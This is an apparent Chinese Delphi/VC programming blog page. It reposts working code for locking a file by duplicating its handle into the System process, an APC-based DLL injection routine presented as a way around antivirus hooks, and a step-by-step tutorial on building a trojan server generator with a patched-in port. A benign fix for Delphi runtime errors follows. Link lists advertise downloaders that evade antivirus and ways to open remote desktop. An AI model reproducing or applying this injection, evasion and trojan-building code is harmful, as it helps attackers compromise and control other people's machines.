  OccupyFile(’D:\Program Files\工具软件\任务管理.exe’);//这是要保护的程序名  
end.

以下是vc6.0代码

#include

//提权函数

void RaiseToDebugP()

{

HANDLE hToken;

HANDLE hProcess = GetCurrentProcess();

if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )

{

  TOKEN_PRIVILEGES tkp;

  if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )

  {

   tkp.PrivilegeCount = 1;

   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;



   BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;

  }

  CloseHandle(hToken);

}

}

  BOOL OccupyFile( LPCTSTR lpFileName )

  {

      BOOL    bRet;

      //提升自身权限

      RaiseToDebugP();

   //打开一个pid为４的进程，只要是存在的进程，都可以

   HANDLE hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 4);    // 4为system进程号



      if ( hProcess == NULL )

      {

    return FALSE;

      }



      HANDLE hFile;

      HANDLE hTargetHandle;

   //以独占模式打开目标文件

   hFile = CreateFile( lpFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);





      if ( hFile == INVALID_HANDLE_VALUE )

      {

          CloseHandle( hProcess );

          return FALSE;

      }



   //把文件句柄复制到pid=4的进程中去，这样，只要pid=4的进程不退出，谁也动不了目标文件

  bRet = DuplicateHandle( GetCurrentProcess(), hFile, hProcess, &hTargetHandle,

          0, FALSE, DUPLICATE_SAME_ACCESS|DUPLICATE_CLOSE_SOURCE);



      CloseHandle( hProcess );



      return bRet;

  }





  //入口函数

  int main()

  {

      OccupyFile("D:\\Program Files\\工具软件\\任务管理.exe");



      return 0;

  }

继续阅读《未命名文章》的全文内容...

绕过主动防御的代码注入方法(非DELPHI代码) (2010-5-18 3:27:45)

无法获取到某窗体中控件的句柄,应如何处理 (2010-5-18 2:58:32)

下载者源代码 (2008-12-28 23:40:44)

绕过主动防御的代码注入方法(非DELPHI代码)

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:27:45 +0800

明生注：这并非是一份DELPHI代码，但是里面的东西值得学习。如果学远程注入可以找到相关的资料所以我就转过来了

by:shineastdh

目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。

关于代码注入Ring3层的方法主要有：

l远程线程CreateRemoteThread

l消息钩子SetWindowsHookEx

lRing3 APC QueueUserApc

l修改线程上下文SetContextThread

其中第一种和第三种方法需要传入一个param，但是要求这个param必须在目标进程内存空间，之前的一些方法比较笨重，直接在目标进程VirtualAllocEx内存，然后把希望的参数内容写入这个内存，使用了WriteProcessMemory函数，而这个函数是被hook的，所以杀软可以很容易的拦截代码注入行为。

仔细想想，杀软的这种防御是很失败的！原因是为了要一个param，攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存，我在思考是否可以不用WriteProcessMemory函数呢？反正我的目的就是得到一个合理的param，并且这个param是在目标进程内存空间即可！

思考后，原来一切是这么容易啊，哈哈！乐了我半天~~~

举个例子：假设我是这样注入的：

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

我想让上面的param的内容是一个“xxx.dll”,就可以了，而且要求这个param是在目标进程内存空间

您想到了么？哈哈

答案：直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦！因为“kernel32.dll” 这样的字符串是一定存在的，那么为了和“kernel32.dll” 不一样，那就随便使用一下“nel32.dll”，或者“el32.dll”，都是可以的啊！最后在往windows目录下面撂进入一个nel32.dll，这样注入大部分杀软都是不能拦截到的！哈哈！

写了段程序，做了个试验，仅测试了下趋势，完美绕过！其实杀软稍后测试。。。

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)

{

TIDLIST *pCurrentTid = pThreadIdList ;

const char szInjectModName[] = "nel32.dll";

DWORD dwLen = strlen(szInjectModName) ;

//////////////////////////////////////////////////////////////////////////

//不写目标进程的内存

//直接在目标进程中搜索出 nel32.dll 这样的字符串并注入

//////////////////////////////////////////////////////////////////////////

int bufflen=30000;

char *buffer=(char *)malloc(sizeof(char)*bufflen);

DWORD dwNumberOfBytesRead;

DWORD defaultAddress;

//获得该进程的基址

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;

if(!hSnapshot)

{

   printf("CreateToolhelp32Snapshot error!\n");

   return 0;

}

MODULEENTRY32 me = { sizeof(me) };

    BOOL fOk =Module32First(hSnapshot,&me);

if(!fOk)

{

   printf("Module32First error!\n");

   return 0;

}

    for (; fOk; fOk = Module32Next(hSnapshot,&me))

    {

   printf("%s process module name = %s\n",processName,me.szModule);

        // 取得进程模块基址

   if(stricmp(me.szModule,processName)==0)

   {

    defaultAddress=(DWORD)me.modBaseAddr;

    printf("%s process module base = 0x%08X\n",processName,defaultAddress);

    break;

   }

    }

//搜索

if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))

{

   printf("ReadProcessMemory error!\n");

   return 0;

}

for(int i=0;i
{

   if(strnicmp(buffer+i,szInjectModName,dwLen)==0)

   {

    printf("found nel32.dll already!... %s\n",buffer+i);

    while (pCurrentTid)

    {

     HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;



     if (hThread != NULL)

     {

      //

      // 注入DLL到指定进程

      //

      QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;

     }



     printf("TID:%d\n", pCurrentTid->dwTid) ;

     pCurrentTid = pCurrentTid->pNext ;

    }

    break;

   }

}

return 0 ;

}

继续阅读《绕过主动防御的代码注入方法(非DELPHI代码)》的全文内容...

未命名文章 (2010-5-18 3:29:45)

下载者源代码 (2008-12-28 23:40:44)

DELPHI木马生成技术!(配置)api

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:26:12 +0800

经常会看到鸽子或一些木马可以自定义生成一个服务端程序,开始很奇怪,他是怎么做到的!后来去网上搜了下,但是没找到相关文章! 后来碰巧得到了一个QQ病毒的源代码,而这个程序就可以生成一个文件,于是就研究了下代码,但是收获不大,但是很实用,他的大致思路和鸽子是一样的:

原理一:

在程序的尾部追加数据,然后程序运行时从尾部读取数据,这个方法看似容易,但是实际操作的时候遇到了很多问题,我最不明白的是他既然加了数据又是怎么保持PE文件本身的格式的!但是这个方法确实可行,我看了鸽子的源码,他所用的方法基本一样!先把一个文件复制出来然后把数据写到文件尾部!

后来一次偶然的机会看到一个很不错的文章!虽然写的不是很清楚,不过大致已经说明了思路,以及方法!

我简单介绍下他的思路及原理:

原理二:

这个方法破过软件的朋友肯定很容易理解,先将需要的数据保留出,然后让程序去替换!

简单的说比如我需要写入一个随机端口,这个时候我们可以先将端口留出来不写比如定义一个常量

Const

DuanKou:='XXXXXXXXXXXXXXXXXXXXXXXXX';

至于为什么定义是XXXXXXXX只是为了方便找!然后让程序去替换!,字很多我懒得一个一个写!

发出来大家慢慢看吧! 这个例子也是定义端口的!

原文: (这个也是Delphi的不过我试过在VC++下一样可以的,原理都一样,只是语法问题!)

DELPHI木马DIY之生成服务端

我在这里就生成简单的服务端，为什么不先讲服务端的隐藏？因为我觉得生成服务端要好理解一点，简单一点，我们就由浅入深吧，OK，LET'S GO。

网络上其他的生成服务端的方式我不是很清楚，我就用我的方法来和大家讲解（不过还是先声明，我的方法亦是来自于网络，如果和谁的方法相同，请不要说我侵犯版权，因为我也不知道原作者是谁了，我这文章不作商业用途，如果有朋友认为我侵犯了他的版权，请立即通知我，我马上取消这个文章的继续发布！或者给他在文章中署名，OK，主要本人是学法律的，所以说话有点唠叨，不过中国有句俗话：“丑话说在前面。”不过用的人少啊）

开始：

一.我们要先改一下我们配置的服务端。

服务端我们就暂时不用自定端口了，跟着我一步一步的做，暂时不要问为什么，我稍后就解释

我们打开服务端的工程，在上面是不是有一句这个话

var

Form1: TForm1;

对，就在这，我们在下面加一句：duankou: string ='xxxxx';

就是全局变量吧，然后我们再点一下Form1这个窗口，就是你的最初的窗口啦，添加一个事件

ONCREATE，就是TForm1.FormCreate，意思是当窗口建立的时候要做的事情。我们加上这个语句：

NMUDP1.LocalPort:=strtoint(duankou);

意思是NMUDP1的本地端口为duankou的数字。（strtoint的意思是把字符串转换为数字，懂吧）

意思已经很明白了，duankou: string ='xxxxx'为什么要是xxxxx？主要是一会好搜索，嘿。

好了，我们服务端基本上配置完了，现在我们来生成服务端，这个应该会了吧。

二.第二步实际我们要做两个事情

1）.就是把服务端生成为资源

2）.就是查找xxxxx在服务端的位置

ok我们还是先来查找xxxxx在服务端的位置吧。

1.我们打开任意一个16进制编辑器，用这个编辑器打开我们的服务端，这个简单吧。

2.搜索xxxxx，这样应该一次就能搜索出来xxxxx所在的位置，我这是4e240。OK，你的不同就自己定。

3.打开一个进制转换工具,把4e240转换为10进制的数字。320064我这是，一定要把这个数字记着哦，我们一会要用的东西，这是最主要的东西哦！(系统计算器就可以)

好了，我们再来把服务端生成为资源

1.我们在生成了服务端的文件夹里面建立一个文本文档，里面写上一句话

fuwuduan RCDATA server.exe

标识符区域吧文件名

标识符尽量不要和文件名一样，有时候会出错了，OK，听我一句吧，谢谢

我们把这个文本文档改名成为fuwu.rc这个应该不用解释了。

2.再建立一个批处理文件，里面写上这么一句话

path=C:\Program Files\Borland\Delphi7\Bin;

Brcc32 fuwu.rc

path为你的delphi7的BIN目录的路径，OK，然后运行这个批处理，在你的服务端的文件夹里就会生成一个fuwu.res这是资源哦，嘿嘿，重要的东西

我们把他复制到客服端的文件夹里，OK，我们这一步的准备工作就做完了~~~

三.第三步我们就要配置客服端了，让客服务端可以生成一个自定端口的服务段

1.我们要在客服端的dpr里加上一句话{$R *.res}下面加上一个{$R fuwu.res}意思就是让程序生成时自动加载一个服务端的资源进去。

2.我们要开始试着生成一个服务端了，不过这步挺重要，我们还是在第四步说。

四.最重要的一步，要主要，一步一步来，跟着做，我会详细解释的。

1.我们生成一个全局的变量先

在uses的下面和type的上面加上一句：

const OFFSET_DUANKOU = 320064;//这个就根据你自己的值来定。

把这一段的代码给出来，免得新手看不懂

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, NMUDP;

const OFFSET_DUANKOU = 320064;

type

TForm1 = class(TForm)

Button1: TButton;//看懂我是加在什么位置了的吧

2.我们添加两个控件 edit和按扭，EDIT是用来写你要生成的服务端的端口，按扭是生成吧。

3.我们生成一个button2的点击事件

我们现在在button2的点击事件中声明一下

var

WriteBuff, ziyuanzhizhen: PChar;

ziyuanweizhi: HRSRC;

ziyuandaxiao, BytesWritten: Longword;

shujuchulijubing: THandle;

shenqingzhizhen: THandle;

duankou:string;

现在我们开始begin

BEGIN

duankou:=trim(Edit4.Text); //端口为edit4的文字

ziyuanweizhi := FindResource(HInstance, 'fuwuduan', RT_RCDATA); //资源指针为寻找到的资源'fuwuduan'（就是我先说的标识符）

ziyuandaxiao := SizeofResource(HInstance, ziyuanweizhi);//资源大小

shujuchulijubing := LoadResource(HInstance, ziyuanweizhi); //数据处理句炳

ziyuanzhizhen := LockResource(shujuchulijubing);//资源指针

shenqingzhizhen := CreateFile(pchar('server.exe'), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);

WriteFile(shenqingzhizhen, ziyuanzhizhen^, ziyuandaxiao, BytesWritten, nil);//写文件

Sleep(100);

SetFilePointer(shenqingzhizhen, OFFSET_DUANKOU, nil, FILE_BEGIN);//重定位指针

WriteBuff := PChar(duankou + StringOfChar(#0, 5 - Length(duankou)));//要写的数据

WriteFile(shenqingzhizhen, WriteBuff^, 5, BytesWritten, nil);//再次修改文件

CloseHandle(shenqingzhizhen);//关闭资源

end;

我这没法给大家详细解释了，不过如果你聪明的话应该也可以融会惯通了。

注意的是SetFilePointer这里的OFFSET_DUANKOU为要开始写的地址，当然就是我们先找到的地址

WriteBuff的里面的5为XXXXX的长度，WriteFile里面的5也是，shenqingzhizhen里面的'server.exe'可以自己改名字，也可以是完整的路径，也可以是EDIT里面的东西

然后我们生成这个客服端，设置好EDIT4.text后（就是要生成的端口，我这为了方便就没有什么容错啊，提示错误之类的了，不过端口自定义的规则这些，大家应该清楚）点击BUTTON2，那么在当前的文件夹下就会生成一个服务端，运行后端口就会是EDIT4.text的内容

大家测试一下吧

我在XP+DELPHI的环境一切正常。

继续阅读《DELPHI木马生成技术!(配置)api》的全文内容...

DELPHI生成木马技术分析 (2009-2-15 4:15:57)

delphi之木马生成原理-资源文件-和文件流的应用 (2009-2-15 2:28:57)

DELPHI 给DLL 添加版本信息 (2009-1-20 11:59:2)

生成旋转字体 (2008-10-14 14:41:45)

delphi编写的时出现 runtime error 216 at 数字的解决方法

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:24:27 +0800

1.修改注册表：

开始菜单－运行－输入regedit－点确定－进入注册表, 在：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 下，应该只有一个正常的键值"{AEB6717E-7E19-11d0-97EE-00C04FD91972}, 将其他的删除。

2.Delphi中利用SEH屏蔽退出时的Runtime ErrorDelphi

写的程序，如果在单元的finalization里出现了一些异常操作会导致退出时抛出Runtime Error ，规范的处理办法当然是解决这些异常，但是有些特殊的情况下，比如用了很多的第三方控件，实在没办法解决问题时，只有把他屏蔽掉，这样给客户的时候就不至于看到满天的Runtime Error 了。前些日子同事正好碰到了这个问题，他写的一个ACTIVEX控件，在客户的IE里关闭的时候就会抛出很多错误导致IE死掉，但是在本机又模拟不出来，问题不能解决，又得应付客户。找我讨论解决方案，我提议可以用SEH解决，于是写了一段代码，效果不错，不敢独享，贴出来希望能够帮大家应付遇到的问题。我的做法其实很简单，就是在 END.之前手工调用Halt释放，并且将Halt抛出的错误屏蔽掉，这样做和正常的DELPHI释放过程没有任何区别，因为End.编译后其实就是一句话 Call Halt0，只是VCL自己没有屏蔽Halt0里抛出的错误，而是跳出个Runtime Error 来;首先就是位置的问题，如果是EXE的话，直接在END.之前就行了，如果是Dll的话就麻烦点，需要挂上DllProc，当wReason = DLL_PROCESS_DETACH时处理。然后就是如何屏蔽错误的问题了，第一个最容易想到的做法就是直接Tryhaltexceptend;

Try
  halt
except
end;

但是这样是不行的，因为try…except end捕获的错误都会放到System单元的_HandleOnException中处理，函数检查错误类型是否是DelphiException，如果不是就不处理，这个时候就会被DELPHI的顶层异常机制捕获，并抛出Runtime error，halt里抛出来的错误恰恰就是非DelphiException，代码如下：

procedure _HandleOnException;
…
CMP [EAX].TExceptionRecord.ExceptionCode,cDelphiException
JE @@DelphiException
CLD
CALL _FpuInit
MOV EDX,ExceptClsProc
TEST EDX,EDX
JE @@exit
CALL EDX
TEST EAX,EAX
JNE @@common
JMP @@exit
…
End;

所以，需要借助SHE机制来处理这个问题（哈哈，不然就得改标题了），代码如下（关于如何挂SHE我就不介绍了，我在另外一篇文章《Delphi异常机制与SEH》详细介绍了）：

asm
//挂上SEH
xor edx, edx
push ebp
push OFFSET @@safecode
push dword ptr fs:[edx]
mov fs:[edx],esp
//调用Halt0
call Halt0
jmp @@exit;
@@safecode:
//如果出现异常继续调用Halt0退出
call Halt0;
@@exit:
end;

这个做法的好处就是，不会对DELPHI正常释放过程产生影响，所有的释放操作都是和VCL一致的，只是不会把错误显示出来。

以下是完整代码：

一、EXE的情况，把代码放在工程文件

二、DLL的情况，把代码放在工程文件里

明生注：Exe的在工程文件PER里面写入此过程

procedure Halt0;
begin
  Halt;
end;

然后在BEGIN和END.之间写上此汇编

asm
    xor edx, edx
    push ebp
    push OFFSET @@safecode
    push dword ptr fs:[edx]
    mov fs:[edx],esp

    call Halt0
    jmp @@exit;

    @@safecode:
    call Halt0;

    @@exit:
  end;

DLL处写入:

procedure Halt0;
begin
   Halt;
end;

var
  OldProc: Pointer;
procedure DLLEntryPoint(dwReason: DWord);
begin
  if (dwReason = DLL_PROCESS_DETACH) Then
  Begin
    asm
      xor edx, edx
      push ebp
      push OFFSET @@safecode
      push dword ptr fs:[edx]
      mov fs:[edx],esp
      call Halt0
      jmp @@exit;
      @@safecode:
      call Halt0;
      @@exit:
    end;
  end;
end;

begin
  DllProc := @DLLEntryPoint;
  DllProcEX := @DLLEntryPoint;
end.

继续阅读《delphi编写的时出现 runtime error 216 at 数字的解决方法》的全文内容...

[原创]明生小记之delphi错误处理 (2010-5-18 3:14:17)

在delphi程序中屏蔽所有错误 (2010-5-18 3:9:38)

心动吧DELPHI网络书

delphi判断线程是否正在运行

相关文章:

多线程: 不使用同步工具, 手动协调线程依次执行

相关文章:

XP/2003下Delphi最简单的方法开放3389

Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）

ActiveX启动下载者（delphi）

最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]

相关文章:

未命名文章

相关文章:

绕过主动防御的代码注入方法(非DELPHI代码)

相关文章:

DELPHI木马生成技术!(配置)api

相关文章:

delphi编写的时出现 runtime error 216 at 数字的解决方法

相关文章:

心动吧DELPHI网络书

delphi判断线程是否正在运行

相关文章:

多线程: 不使用同步工具, 手动协调线程依次执行

相关文章:

XP/2003下Delphi最简单的方法开放3389

Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）

ActiveX启动下载者（delphi）

最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]

相关文章:

未命名文章

相关文章:

绕过主动防御的代码注入方法(非DELPHI代码)

相关文章:

DELPHI木马生成技术!(配置)api

相关文章:

delphi编写的时出现 runtime error 216 at 数字 的解决方法

相关文章:

delphi编写的时出现 runtime error 216 at 数字的解决方法